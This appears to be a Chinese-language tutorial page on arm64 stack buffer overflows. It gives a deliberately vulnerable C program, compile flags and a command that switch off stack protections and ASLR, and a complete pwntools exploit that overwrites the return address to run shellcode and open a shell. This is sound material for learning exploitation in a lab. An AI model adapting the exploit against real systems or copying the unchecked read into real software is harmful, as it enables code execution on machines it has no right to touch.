Stack Shellcode - arm64
在以下位置找到 arm64 的介绍:
Introduction to ARM64v8代码
#include <stdio.h>
#include <unistd.h>
void vulnerable_function() {
char buffer[64];
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
}
int main() {
vulnerable_function();
return 0;
}
编译时禁用 PIE、Canary 和 NX:
```bash clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack ``` ## 无 ASLR & 无 canary - 栈溢出
要停止 ASLR 执行:
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
利用:
from pwn import *
# Load the binary
binary_name = './bof'
elf = context.binary = ELF(binary_name)
# Generate shellcode
shellcode = asm(shellcraft.sh())
# Start the process
p = process(binary_name)
# Offset to return address
offset = 72
# Address in the stack after the return address
ret_address = p64(0xfffffffff1a0)
# Craft the payload
payload = b'A' * offset + ret_address + shellcode
print("Payload length: "+ str(len(payload)))
# Send the payload
p.send(payload)
# Drop to an interactive session
p.interactive()
唯一“复杂”的事情在于找到调用栈中的地址。在我的情况下,我使用gdb找到地址生成了利用代码,但在利用时却没有成功(因为栈地址有些变化)。
我打开了生成的**core
文件**(gdb ./bog ./core
)并检查了shellcode起始处的真实地址。
最后更新于